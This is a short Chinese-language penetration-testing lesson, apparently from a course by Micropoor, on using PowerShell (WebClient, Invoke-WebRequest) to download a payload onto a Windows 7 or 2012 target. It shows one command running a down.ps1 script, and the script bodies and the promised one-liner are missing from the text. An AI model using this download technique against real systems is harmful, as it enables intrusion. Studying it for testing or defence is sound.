第四十六课:powershell一句话下载payload

自 Windows7 以后内置了 powershell,如Windows 7 中内置了 PowerShell2.0, Windows 8 中内置了 PowerShell3.0。

靶机:windows 7 powershell $PSVersionTable

down.ps1:

基于System.Net.WebClient

附:

靶机:windows 2012 powershell $PSVersionTable

down.ps1:

在 powershell 3.0以后,提供 wget 功能,既 Invoke-WebRequest

C:\inetpub>powershell C:\inetpub\down.ps1 注:需要绝对路径。

附:

当然也可以一句话执行下载:

Micropoor

Last updated

Was this helpful?